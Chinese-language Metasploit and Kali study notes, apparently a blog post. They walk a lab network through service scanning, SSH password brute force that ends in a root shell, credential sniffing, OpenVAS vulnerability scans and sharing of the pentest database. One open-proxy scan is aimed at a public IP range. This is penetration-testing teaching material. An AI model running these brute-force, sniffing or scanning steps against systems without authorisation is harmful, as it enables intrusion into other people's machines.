	   exploit/windows/fileformat/digital_music_pad_pls         2010-09-17       normal   Digital Music Pad Version 8.2.3.3.4 Stack Buffer Overflow
	   exploit/windows/fileformat/orbit_download_failed_bof     2008-04-03       normal   Orbit Downloader URL Unicode Conversion Overflow
	   exploit/windows/fileformat/realplayer_ver_attribute_bof  2013-12-20       normal   RealNetworks RealPlayer Version Attribute Buffer Overflow
	   exploit/windows/ftp/filecopa_list_overflow               2006-07-19       average  FileCopa FTP Server Pre 18 Jul Version
	   exploit/windows/scada/iconics_genbroker                  2011-03-21       good     Iconics GENESIS32 Integer Overflow Version 9.21.201.01

1. 常见的网络服务扫描
	Telnet 服务扫描
		msf > use auxiliary/scanner/telnet/telnet_version 
		msf auxiliary(telnet_version) > set RHOSTS 10.10.10.0/24
		RHOSTS => 10.10.10.0/24
		msf auxiliary(telnet_version) > set THREADS 100
		THREADS => 100
		msf auxiliary(telnet_version) > run
		[*] 10.10.10.254:23 gate.dvssc.com login:                 _       _ _        _     _      ____  \x0a _ __ ___   ___| |_ __ _ ___ _ __ | | ___ (_) |_ __ _| |__ | | ___|___ \ \x0a| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __/ _` | '_ \| |/ _ \ __) |\x0a| | | | | |  __/ || (_| \__ \ |_) | | (_) | | || (_| | |_) | |  __// __/ \x0a|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__\__,_|_.__/|_|\___|_____|\x0a                            |_|                                          \x0a\x0a\x0aWarning: Never expose this VM to an untrusted network!\x0a\x0aContact: msfdev[at]metasploit.com\x0a\x0aLogin with msfadmin/msfadmin to get started\x0a\x0a\x0agate.dvssc.com login:
		[*] Scanned 256 of 256 hosts (100% complete)
		[*] Auxiliary module execution completed
		结果显示:10.10.10.254 开放了 Telnet 服务 

	SSH 服务扫描
		msf > use auxiliary/scanner/ssh/ssh_version 
		msf auxiliary(ssh_version) > set RHOSTS 10.10.10.0/24
		RHOSTS => 10.10.10.0/24
		msf auxiliary(ssh_version) > set THREADS 100
		THREADS => 100
		msf auxiliary(ssh_version) > run
		[*] 10.10.10.128:22       - SSH server version: SSH-2.0-OpenSSH_7.4p1 Debian-10
		[*] 10.10.10.129:22       - SSH server version: SSH-2.0-OpenSSH_5.3p1 Debian-3ubuntu4 ( service.version=5.3p1 openssh.comment=Debian-3ubuntu4 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH os.vendor=Ubuntu os.device=General os.family=Linux os.product=Linux os.version=10.04 service.protocol=ssh fingerprint_db=ssh.banner )
		[*] 10.10.10.254:22       - SSH server version: SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1 ( service.version=4.7p1 openssh.comment=Debian-8ubuntu1 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH os.vendor=Ubuntu os.device=General os.family=Linux os.product=Linux os.version=8.04 service.protocol=ssh fingerprint_db=ssh.banner )
		[*] Auxiliary module execution completed
		结果显示:10.10.10.254 和 10.10.10.129 开放了 SSH 服务
2. Oracle 数据库服务查点
	msf > use auxiliary/scanner/oracle/tnslsnr_version 
		msf auxiliary(tnslsnr_version) > set RHOSTS 10.10.10.0/24
		RHOSTS => 10.10.10.0/24
		msf auxiliary(tnslsnr_version) > set THREADS 50
		THREADS => 50
		msf auxiliary(tnslsnr_version) > run
		[*] Scanned  50 of 256 hosts (19% complete)
		[+] 10.10.10.130:1521 - 10.10.10.130:1521 Oracle - Version: 32-bit Windows: Version 10.2.0.1.0 - Production
		[*] Scanned 129 of 256 hosts (50% complete)
		[*] Scanned 167 of 256 hosts (65% complete)				
		[*] Scanned 184 of 256 hosts (71% complete)
		[*] Scanned 256 of 256 hosts (100% complete)
		[*] Auxiliary module execution completed
		结果显示:10.10.10.130 开放了 1521 端口(Oracle SQL)
				SQL Server 端口为 1433
				Oracle SQL 端口为 1521
3. 开放代理探测与利用
	open_proxy:方便地获取免费的 HTTP 代理服务器地址
	msf > use auxiliary/scanner/http/open_proxy 
	msf auxiliary(open_proxy) > show options
	Module options (auxiliary/scanner/http/open_proxy):
	   Name           Current Setting           Required  Description
	   ----           ---------------           --------  -----------
	   CHECKURL       http://www.google.com     yes       The web site to test via alleged web proxy
	   MULTIPORTS     false                     no        Multiple ports will be used: 80, 443, 1080, 3128, 8000, 8080, 8123
	   Proxies                                  no        A proxy chain of format type:host:port[,type:host:port][...]
	   RHOSTS                                   yes       The target address range or CIDR identifier
	   RPORT          8080                      yes       The target port (TCP)
	   SSL            false                     no        Negotiate SSL/TLS for outgoing connections
	   THREADS        1                         yes       The number of concurrent threads
	   VALIDCODES     200,302                   yes       Valid HTTP code for a successfully request
	   VALIDPATTERN   302 Moved  yes       Valid pattern match (case-sensitive into the headers and HTML body) for a successfully request
	   VERIFYCONNECT  false                     no        Enable CONNECT HTTP method check
	   VHOST                                    no        HTTP server virtual host
	msf auxiliary(open_proxy) > set SITE www.google.com
	SITE => www.google.com
	msf auxiliary(open_proxy) > set RHOSTS 24.25.24.1-24.25.26.254
	RHOSTS => 24.25.24.1-24.25.26.254
	msf auxiliary(open_proxy) > set MULTIPORTS true
	MULTIPORTS => true
	msf auxiliary(open_proxy) > set THREADS 100
	THREADS => 100
	msf auxiliary(open_proxy) > run
	[*] Scanned 102 of 766 hosts (13% complete)	
	[*] Scanned 397 of 766 hosts (51% complete)
	[*] Scanned 766 of 766 hosts (100% complete)
	[*] Auxiliary module execution completed
4. SSH 服务口令与嗅探
	msf > use auxiliary/scanner/ssh/ssh_login
	msf auxiliary(ssh_login) > set RHOSTS 10.10.10.254
	RHOSTS => 10.10.10.254
	msf auxiliary(ssh_login) > set USERNAME root
	USERNAME => root
	msf auxiliary(ssh_login) > set PASS_FILE /root/words.txt
	PASS_FILE => /root/words.txt
	msf auxiliary(ssh_login) > set THREADS 50
	THREADS => 50
	msf auxiliary(ssh_login) > run
	[*] SSH - Starting bruteforce
	[-] SSH - Failed: 'root:123456'
	[-] SSH - Failed: 'root:ubuntu'
	[+] SSH - Success: 'root:toor' 'uid=0(root) gid=0(root) groups=0(root) Linux gate.dvssc.com 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
	[*] Command shell session 1 opened (10.10.10.128:42501 -> 10.10.10.254:22) at 2017-08-29 01:18:09 -0400
	[*] Scanned 1 of 1 hosts (100% complete)
	[*] Auxiliary module execution completed
5. psnuffle 口令嗅探
	msf > use auxiliary/sniffer/psnuffle 
	msf auxiliary(psnuffle) > run
	[*] Auxiliary module execution completed

	[*] Loaded protocol FTP from /usr/share/metasploit-framework/data/exploits/psnuffle/ftp.rb...
	[*] Loaded protocol IMAP from /usr/share/metasploit-framework/data/exploits/psnuffle/imap.rb...
	[*] Loaded protocol POP3 from /usr/share/metasploit-framework/data/exploits/psnuffle/pop3.rb...
	msf auxiliary(psnuffle) > [*] Loaded protocol SMB from /usr/share/metasploit-framework/data/exploits/psnuffle/smb.rb...
	[*] Loaded protocol URL from /usr/share/metasploit-framework/data/exploits/psnuffle/url.rb...
	[*] Sniffing traffic.....
6. 在 Metasploit 内部使用 OpenVAS
		
	0. 开启 openvas 服务
		root@attacker:~# openvas-start
		
	1. 在 metasploit 中加载 openvas
		msf > load openvas 
		[*] Welcome to OpenVAS integration by kost and averagesecurityguy.
		[*] Successfully loaded plugin: OpenVAS
		
	2. 连接到 openvas ,用法:openvas_connect username password host port 	
		msf > openvas_connect admin toor 127.0.0.1 9390 ok 
		[*] Connecting to OpenVAS instance at 127.0.0.1:9390 with username admin...
		[+] OpenVAS list of targets
		ID                                    Name                                          Hosts         Max Hosts  In Use  Comment
		--                                    ----                                          -----         ---------  ------  -------
		5e78a0e1-6569-45d9-8474-d7c83d0ea8ff  test2                                         10.10.10.254  1          0       Metasploitable
		971d579a-b65c-406c-9737-b4d946fb68b1  UUUU                                          10.10.10.254  1          1       Mwtasploitable
	
	3. 列出 openvas 的配置选项
		msf > openvas_config_list 
		/usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/openvas-omp-0.0.4/lib/openvas-omp.rb:201:in `sendrecv': Object#timeout is deprecated, use Timeout.timeout instead.
		[+] OpenVAS list of configs
		ID                                    Name
		--                                    ----
		085569ce-73ed-11df-83c3-002264764cea  empty
		2d3f051c-55ba-11e3-bf43-406186ea4fc5  Host Discovery
		698f691e-7489-11df-9d8c-002264764cea  Full and fast ultimate
		708f25c4-7489-11df-8094-002264764cea  Full and very deep
		74db13d6-7489-11df-91b9-002264764cea  Full and very deep ultimate
		8715c877-47a0-438d-98a3-27c7a6ab2196  Discovery
		bbca7412-a950-11e3-9109-406186ea4fc5  System Discovery
		daba56c8-73ec-11df-a475-002264764cea  Full and fast

	4. 创建扫描任务,Usage: openvas_task_create    
		msf > openvas_task_create test-scan "Scan of test2 Metasploitable" daba56c8-73ec-11df-a475-002264764cea 5e78a0e1-6569-45d9-8474-d7c83d0ea8ff
		[+] OpenVAS list of tasks
		ID                                    Name                               Comment                                 Status   Progress
		--                                    ----                               -------                                 ------   --------
		1ff1e36e-1d76-4a62-b17b-8eb0d11977ba  UUOO                               OOOOOOOOO                               Done     -1
		b4baa75d-9d51-4393-a8fd-66a0480bda28  test-scan                          Scan of test2 Metasploitable            New      -1
	
	5. 开始扫描任务,用法:openvas_task_start 
		msf > openvas_task_start b4baa75d-9d51-4393-a8fd-66a0480bda28
		[+] OpenVAS list of tasks
		ID                                    Name                               Comment                                 Status     Progress
		--                                    ----                               -------                                 ------     --------
		1ff1e36e-1d76-4a62-b17b-8eb0d11977ba  UUOO                               OOOOOOOOO                               Done       -1
		b4baa75d-9d51-4393-a8fd-66a0480bda28  test-scan                          Scan of test2 Metasploitable            Requested  1
		
	6. 列出扫描任务
		msf > openvas_task_list 
		/usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/openvas-omp-0.0.4/lib/openvas-omp.rb:201:in `sendrecv': Object#timeout is deprecated, use Timeout.timeout instead.
		[+] OpenVAS list of tasks
		ID                                    Name                               Comment                                 Status   Progress
		--                                    ----                               -------                                 ------   --------
		1ff1e36e-1d76-4a62-b17b-8eb0d11977ba  UUOO                               OOOOOOOOO                               Done     -1
		b4baa75d-9d51-4393-a8fd-66a0480bda28  test-scan                          Scan of test2 Metasploitable            Running  1
	
	7. 列出扫描任务
		msf > openvas_task_list 
		/usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/openvas-omp-0.0.4/lib/openvas-omp.rb:201:in `sendrecv': Object#timeout is deprecated, use Timeout.timeout instead.
		[+] OpenVAS list of tasks

		ID                                    Name                               Comment                                 Status   Progress
		--                                    ----                               -------                                 ------   --------
		1ff1e36e-1d76-4a62-b17b-8eb0d11977ba  UUOO                               OOOOOOOOO                               Done     -1
		b4baa75d-9d51-4393-a8fd-66a0480bda28  test-scan                          Scan of test2 Metasploitable            Done     -1

	8. 扫描完成后,列出扫描报告
		msf > openvas_report_list
		ID                                    Task Name                          Start Time            Stop Time
		--                                    ---------                          ----------            ---------
		752e8852-68f4-4bff-a23c-92767a6c9bd7  test-scan                          2017-08-30T06:12:51Z  2017-08-30T06:13:06Z
		babf1f94-c1ca-4b4e-b678-a0cd355c6a72  UUOO                               2017-08-30T00:42:12Z  2017-08-30T01:06:41Z
		
	9. 列出报告支持的格式
		msf > openvas_format_list 
		/usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/openvas-omp-0.0.4/lib/openvas-omp.rb:201:in `sendrecv': Object#timeout is deprecated, use Timeout.timeout instead.
		[+] OpenVAS list of report formats
		ID                                    Name           Extension  Summary
		--                                    ----           ---------  -------
		5057e5cc-b825-11e4-9d0e-28d24461215b  Anonymous XML  xml        Anonymous version of the raw XML report
		50c9950a-f326-11e4-800c-28d24461215b  Verinice ITG   vna        Greenbone Verinice ITG Report, v1.0.1.
		5ceff8ba-1f62-11e1-ab9f-406186ea4fc5  CPE            csv        Common Product Enumeration CSV table.
		6c248850-1f62-11e1-b082-406186ea4fc5  HTML           html       Single page HTML report.
		77bd6c4a-1f62-11e1-abf0-406186ea4fc5  ITG            csv        German "IT-Grundschutz-Kataloge" report.
		9087b18c-626c-11e3-8892-406186ea4fc5  CSV Hosts      csv        CSV host summary.
		910200ca-dc05-11e1-954f-406186ea4fc5  ARF            xml        Asset Reporting Format v1.0.0.
		9ca6fe72-1f62-11e1-9e7c-406186ea4fc5  NBE            nbe        Legacy OpenVAS report.
		9e5e5deb-879e-4ecc-8be6-a71cd0875cdd  Topology SVG   svg        Network topology SVG image.
		a3810a62-1f62-11e1-9219-406186ea4fc5  TXT            txt        Plain text report.
		a684c02c-b531-11e1-bdc2-406186ea4fc5  LaTeX          tex        LaTeX source file.
		a994b278-1f62-11e1-96ac-406186ea4fc5  XML            xml        Raw XML report.
		c15ad349-bd8d-457a-880a-c7056532ee15  Verinice ISM   vna        Greenbone Verinice ISM Report, v3.0.0.
		c1645568-627a-11e3-a660-406186ea4fc5  CSV Results    csv        CSV result list.
		c402cc3e-b531-11e1-9163-406186ea4fc5  PDF            pdf        Portable Document Format report.

	10. 下载扫描报告,Usage: openvas_report_download    
		msf > openvas_report_download 
		[*] Usage: openvas_report_download    
		msf > openvas_report_download 752e8852-68f4-4bff-a23c-92767a6c9bd7 c402cc3e-b531-11e1-9163-406186ea4fc5 /root/reports/ tast2_scan_report.pdf
		/usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/openvas-omp-0.0.4/lib/openvas-omp.rb:201:in `sendrecv': Object#timeout is deprecated, use Timeout.timeout instead.
		[*] Saving report to /root/reports/tast2_scan_report.pdf

7. 查找特定服务漏洞

nmap 脚本存放位置:/usr/share/nmap/scripts
root@attacker:/usr/share/nmap/scripts# nmap --script=smb-check-vulns 10.10.10.130
错误信息:NSE: failed to initialize the script engine:
	/usr/bin/../share/nmap/nse_main.lua:801: ‘smb-check-vulns.nse’ did not match a category, filename, or directory
这是由于从NMAP 6.49beta6开始,smb-check-vulns.nse脚本被取消了。
它被分为smb-vuln-conficker、?smb-vuln-cve2009-3103、smb-vuln-ms06-025、smb-vuln-ms07-029、smb-vuln-regsvc-dos、smb-vuln-ms08-067这六个脚本。
用户根据需要选择对应的脚本。如果不确定执行哪一个,可以使用smb-vuln-*.nse来指定所有的脚本文件。

root@attacker:/usr/share/nmap/scripts# nmap --script=smb-vuln-*.nes 10.10.10.130
	Starting Nmap 7.60 ( https://nmap.org ) at 2017-08-30 08:12 EDT
	mass_dns: warning: Unable to open /etc/resolv.conf. Try using --system-dns or specify valid servers with --dns-servers
	mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
	Nmap scan report for service.dvssc.com (10.10.10.130)
	Host is up (0.00022s latency).
	Not shown: 985 closed ports
	PORT     STATE SERVICE
	21/tcp   open  ftp
	80/tcp   open  http
	135/tcp  open  msrpc
	139/tcp  open  netbios-ssn
	445/tcp  open  microsoft-ds
	777/tcp  open  multiling-http
	1025/tcp open  NFS-or-IIS
	1026/tcp open  LSA-or-nterm
	1027/tcp open  IIS
	1031/tcp open  iad2
	1521/tcp open  oracle
	6002/tcp open  X11:2
	7001/tcp open  afs3-callback
	7002/tcp open  afs3-prserver
	8099/tcp open  unknown
	MAC Address: 00:0C:29:DB:51:D2 (VMware)

	Host script results:
	| smb-vuln-cve2009-3103: 
	|   VULNERABLE:
	|   SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
	|     State: VULNERABLE
	|     IDs:  CVE:CVE-2009-3103
	|           Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2, 
	|           Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a 
	|           denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE 
	|           PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location, 
	|           aka "SMBv2 Negotiation Vulnerability." 
	|           
	|     Disclosure date: 2009-09-08
	|     References:
	|       http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
	|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
	| smb-vuln-ms08-067: 
	|   VULNERABLE:
	|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
	|     State: VULNERABLE
	|     IDs:  CVE:CVE-2008-4250
	|           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, 
	|           Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary 
	|           code via a crafted RPC request that triggers the overflow during path canonicalization.
	|           
	|     Disclosure date: 2008-10-23
	|     References:
	|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
	|_      https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
	|_smb-vuln-ms10-054: false
	|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
	| smb-vuln-ms17-010: 
	|   VULNERABLE:
	|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
	|     State: VULNERABLE
	|     IDs:  CVE:CVE-2017-0143
	|     Risk factor: HIGH
	|       A critical remote code execution vulnerability exists in Microsoft SMBv1
	|        servers (ms17-010).
	|           
	|     Disclosure date: 2017-03-14
	|     References:
	|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
	|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
	|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
	Nmap done: 1 IP address (1 host up) scanned in 6.78 seconds

###8. 漏洞扫描结果分析###

服务器 操作系统 高危漏洞 参考
后台服务器(10.10.10.130) Windows Buffer overflow in the ScStoragePathFromUrl function in the WebDAV service CVE-2017-7269
IIS FTP Service RCE and DoS Vulnerability." CVE-2009-3023
IIS FTP Service RCE and DoS Vulnerability CVE-2009-3023
Integer Overflow in IPP Service Vulnerability CVE-2008-1446
Integer Overflow in IPP Service Vulnerability CVE-2008-1446
IIS Authentication Memory Corruption Vulnerability. CVE-2010-1256
"IIS Authentication Memory Corruption Vulnerability CVE-2010-1256
The WebDAV extension in Microsoft Internet Information Services CVE-2009-1535
IIS 5.1 and 6.0 WebDAV Authentication Bypass Vulnerability CVE-2009-1535
Microsoft Internet Information Services CVE-2009-4444
Microsoft Internet Information Services CVE-2009-4444
IIS Repeated Parameter Request Denial of Service Vulnerability." CVE-2010-1899
IIS Repeated Parameter Request Denial of Service Vulnerability." CVE-2010-1899
Inverse Lookup Log Corruption (ILLC) CVE-2003-1582
IIS FTP Service DoS Vulnerability CVE-2009-2521
Inverse Lookup Log Corruption (ILLC) CVE-2003-1582
IIS FTP Service DoS Vulnerability CVE-2009-2521
服务器 操作系统 高危漏洞 参考
网关服务器(10.10.10.254) Linux ProFTPD Server SQL Inj ection Vulnerability CVE-2009-0542
ProFTPD Long Command Handling Security Vulnerability CVE-2008-4242
PHP< 5.2.13 Multiple Vulnerabilities CVE-2010-1128
PHP’sqlite_single_query()’ and ‘sqlite_array_query()’ Arbitrary Code Execution
PHP Multiple Information Disclosure Vulnerabilities CVE-2010-2190
Heap-based buffer overflow in’mbstring’ extension for PHP CVE-2008-5557
PHP Multiple Vulnerabilities Dec-09 CVE-2009-4018
PHP ‘_gdGetColors()’ Buffer Overflow Vulnerability CVE-2009-3546
http TRACE XSS attack CVE-2004-2320
PHP Multiple Buffer Overflow Vulnerabilities CVE-2008-3659
PHP Interruptions and Calltime Arbitrary Code Execution Vulnerability
PHP ‘SplObjectStorage’ Unserializer Arbitrary Code Execution Vulnerability CVE-2010-2225
Samba SID Parsing Remote Buffer Overflow Vulnerability CVE-2010-3069
Samba multiple vulnerabilities CVE-2009-2813
Samba’mount.cifs’ Utility Local Privilege Escalation Vulnerability CVE-2009-3297
Samba ‘SMB1Packet Chaining’ Unspecified Remote Memory Corruption Vulnerability CVE-2010-2063
服务器 操作系统 高危漏洞 参考
网站服务器(10.10.10.129) Linux Heap-based buffer overflow in the dcerpc_read_ncacn_packet_done function in librpc/rpc/dcerpc_util.c in winbindd in Samba CVE-2013-4408
Apache Tomcat 6.x before 6.0.44, 7.x before 7.0.55, and 8.x before 8.0.9 does not properly handle cases where an HTTP response occurs before finishing the reading of an entire request body CVE-2014-0230
Certain AJP protocol connector implementations in Apache Tomcat 7.0.0 through 7.0.20, 6.0.0 through 6.0.33, 5.5.0 through 5.5.33, and possibly other versions allow remote attackers to spoof AJP requests CVE-2011-3190
an attacker can reach JMX ports CVE-2016-8735
Stack-based buffer overflow in Samba CVE-2010-3069
allows remote attackers to inject a request into a session by sending this request during completion of the login form, CVE-2013-2067
apache:tomcat:6.0.24 the attacker could poison a web-cache CVE-2016-6816
Multiple cross-site request forgery (CSRF) vulnerabilities in the Samba Web Administration Tool (SWAT) in Samba CVE-2011-2522
The MS-SAMR and MS-LSAD protocol implementations in Samba CVE-2016-2118
The session-persistence implementation in Apache Tomcat CVE-2016-0714
allows remote authenticated users to obtain the “take ownership” privilege via an LSA connection. CVE-2012-2111
Apache Tomcat 5.5.0 through 5.5.29, 6.0.0 through 6.0.27, and 7.0.0 beta does not properly handle an invalid Transfer-Encoding header, CVE-2010-2227
The default configuration of Apache Tomcat CVE-2010-4312
allows remote attackers to conduct HTTP request smuggling attacks or cause a denial of service (resource consumption) by streaming data with malformed chunked transfer coding. CVE-2014-0227

###9. 渗透测试信息数据库 ###

db_nmap:将 namp 扫描结果直接存入数据库
db_import:将扫描器的扫描结果进行导入

msf > db_status
	[*] postgresql selected, no connection
连接数据库:
	root@attacker:~# systemctl start postgresql.service 
msf > db_status
	[*] postgresql connected to msf

1. db_nmap:是 nmap 的一个封装,不同的是其将结果自动输入到数据库中
	msf > db_nmap -Pn -sV 10.10.10.0/24
		[*] Nmap: Nmap done: 256 IP addresses (6 hosts up) scanned in 411.47 seconds
2. 也可以将数据库的结果导出为一个文件,并导入到渗透测试数据库中
	msf > nmap -Pn -sV -oX dmz 10.10.10.0/24
	root@attacker:~# ll dmz 
		-rw-r--r-- 1 root root 18799 Sep  1 10:32 dmz
	msf > db_import /root/dmz
		[*] Importing 'Nmap XML' data
		[*] Import: Parsing with 'Nokogiri v1.8.0'
		[*] Importing host 10.10.10.1
		[*] Importing host 10.10.10.2
		[*] Importing host 10.10.10.129
		[*] Importing host 10.10.10.130
		[*] Importing host 10.10.10.128
		[*] Successfully imported /root/dmz

###10. Openvas 与渗透测试数据库###

1. 连接 openvas 
	root@attacker:~# openvas-start 
		Starting OpenVas Services
	msf > openvas_connect admin toor 127.0.0.1 9390 ok 
		[*] Connecting to OpenVAS instance at 127.0.0.1:9390 with username admin...
		/usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/openvas-omp-0.0.4/lib/openvas-omp.rb:201:in `sendrecv': Object#timeout is deprecated, use Timeout.timeout instead.
		[+] OpenVAS connection successful
2. 找到想要导入的数据库
	msf > openvas_report_list
		[+] OpenVAS list of reports
		ID                                    Task Name    Start Time            Stop Time
		--                                    ---------    ----------            ---------
		07b3eba7-a110-4117-b603-7e50de27759f  Oswapbwa     2017-08-30T14:41:15Z  2017-08-31T03:02:28Z
		6a0bbe85-3eeb-49e1-8440-32988f6079c8  WIndows 2K3  2017-08-31T01:07:01Z  2017-08-31T01:47:53Z
		d7d88501-fe7d-44d3-8b70-566d49758e3a  Ubuntu-scan  2017-08-30T14:41:20Z  
		eac5169e-290e-4be1-9adf-8a401d806fb2  Ubuntu-Scan  2017-08-31T01:12:44Z  2017-08-31T03:30:24Z
3. 列出报告支持的格式	
	msf > openvas_format_list 
		[+] OpenVAS list of report formats
		ID                                    Name           Extension  Summary
		--                                    ----           ---------  -------
		5057e5cc-b825-11e4-9d0e-28d24461215b  Anonymous XML  xml        Anonymous version of the raw XML report
		50c9950a-f326-11e4-800c-28d24461215b  Verinice ITG   vna        Greenbone Verinice ITG Report, v1.0.1.
		5ceff8ba-1f62-11e1-ab9f-406186ea4fc5  CPE            csv        Common Product Enumeration CSV table.
		6c248850-1f62-11e1-b082-406186ea4fc5  HTML           html       Single page HTML report.
		77bd6c4a-1f62-11e1-abf0-406186ea4fc5  ITG            csv        German "IT-Grundschutz-Kataloge" report.
		9087b18c-626c-11e3-8892-406186ea4fc5  CSV Hosts      csv        CSV host summary.
		910200ca-dc05-11e1-954f-406186ea4fc5  ARF            xml        Asset Reporting Format v1.0.0.
		9ca6fe72-1f62-11e1-9e7c-406186ea4fc5  NBE            nbe        Legacy OpenVAS report.
		9e5e5deb-879e-4ecc-8be6-a71cd0875cdd  Topology SVG   svg        Network topology SVG image.
		a3810a62-1f62-11e1-9219-406186ea4fc5  TXT            txt        Plain text report.
		a684c02c-b531-11e1-bdc2-406186ea4fc5  LaTeX          tex        LaTeX source file.
		a994b278-1f62-11e1-96ac-406186ea4fc5  XML            xml        Raw XML report.
		c15ad349-bd8d-457a-880a-c7056532ee15  Verinice ISM   vna        Greenbone Verinice ISM Report, v3.0.0.
		c1645568-627a-11e3-a660-406186ea4fc5  CSV Results    csv        CSV result list.
		c402cc3e-b531-11e1-9163-406186ea4fc5  PDF            pdf        Portable Document Format report.
4. 导入数据库(将 opwaspbwa 扫描报告的 nbe 格式导入)
	msf > openvas_report_import 07b3eba7-a110-4117-b603-7e50de27759f 9ca6fe72-1f62-11e1-9e7c-406186ea4fc5
		[*] Importing report to database.
5. 导入成功后,使用 vulns 查看导入的漏洞信息
	msf > vulns
		[*] Time: 2017-09-01 14:51:32 UTC Vuln: host=10.10.10.129 name=ICMP Timestamp Detection refs=CVE-1999-0524 

###11. 共享你的渗透测试信息数据库###

在Metasploit中,可以使用两种方法共享渗透测试数据库
-让多台运行 Metasploit 的计算机连接到同一个网络数据库
-使用 MSF RPC服务

-让多台运行 Metasploit 的计算机连接到同一个网络数据库
1. 查看 postgres 进程的运行情况
	root@gate:~# netstat -tulnp | grep "postgres"
		tcp        0      0 0.0.0.0:5432            0.0.0.0:*               LISTEN      4907/postgres   
		tcp6       0      0 :::5432                 :::*                    LISTEN      4907/postgres  
2. 修改数据库监听地址
	root@attacker:~# vim /etc/postgresql/9.6/main/postgresql.conf
		listen_addresses = '0.0.0.0'  #59行 
		password_encryption = on    #88行 
3. pg_hba.conf是客户端认证配置文件,定义如何认证客户端
	root@attacker:~# vim /etc/postgresql/9.6/main/pg_hba.conf 
		host    all     all     0.0.0.0/24      md5     #93行
4. 重启 postgres 数据库服务
	root@attacker:~# systemctl restart postgresql.service
5. 再次查看 postgresql 服务运行是否正常
	root@attacker:~# netstat -tulnp |grep "postgres"
		tcp        0      0 0.0.0.0:5432            0.0.0.0:*               LISTEN      7564/postgres
6. 查看 msf 中 postgres 数据库的信息
	root@attacker:~# vim /usr/share/metasploit-framework/config/database.yml
		development: &pgsql
		  adapter: postgresql
		  database: msf
		  username: msf
		  password: admin
		  host: localhost
		  port: 5432
		  pool: 200
		  timeout: 5
7. 关于数据库的信息如下:
	postgres 地址:10.10.10.128
	postgres 端口:5432
	postgres 用户:msf
	postgres 口令:admin
	postgresql 数据库:msf
8. 在另一台计算机启动 msf 终端
	msf > db_disconnect 
	msf > db_status 
		[*] postgresql selected, no connection
	msf > db_connect msf:[email protected]:5432/msf
		[*] Rebuilding the module cache in the background...
	msf > db_status 
		[*] postgresql connected to msf
9. 测试连接是否正常
	msf > hosts
		Hosts
		=====

		address       mac                name                os_name        os_flavor  os_sp  purpose  info  comments
		-------       ---                ----                -------        ---------  -----  -------  ----  --------
		10.10.10.1    00:50:56:c0:00:08                      Windows Vista                    client         
		10.10.10.2    00:50:56:f0:84:fe                      Unknown                          device         
		10.10.10.128                     attacker.dvssc.com  Unknown                          device         
		10.10.10.129  00:0c:29:19:70:bf  www.dvssc.com       Unknown                          device         
		10.10.10.130  00:0c:29:db:51:d2  service.dvssc.com   Windows XP                       client         
		10.10.10.133                                         Linux                     3.X    server         
		10.10.10.254  00:0c:29:19:70:bf  gate.dvssc.com      Linux                     2.6.X  server         
 
-使用 MSF RPC服务
1. 首先启动新的 msf rpc 服务,-P指定连接所需要的口令,-U指定连接所需要的用户名,-a绑定网络地址,默认127.0.0.1
	root@attacker:~# msfrpcd -P admin -U msf -a 0.0.0.0
		[[*] MSGRPC starting on 0.0.0.0:55553 (SSL):Msg...
		[*] MSGRPC backgrounding at 2017-09-06 21:38:09 -0400...
	root@attacker:~# netstat -tulnp| grep msfrpcd
		tcp        0      0 0.0.0.0:55553           0.0.0.0:*               LISTEN      1794/msfrpcd
2. 在另一台安装 msf4(版本匹配)的计算机上启动 MSF GUI(最新版是armitage)
	root@attacker:~# armitage   #会显示登录框
		Host 10.10.10.128
		Port 55553
		User msf
		Pass admin
3. 这个登录框会连接到之前新建的 msfprcd 服务上,单击 Server,之前 10.10.10.128 主机上的渗透测试数据都在这里显示出来。
		msfprcd 不仅可以共享渗透测试数据库,还可以共享所有的 msf 模块和攻击载荷

你可能感兴趣的:(kali-linux)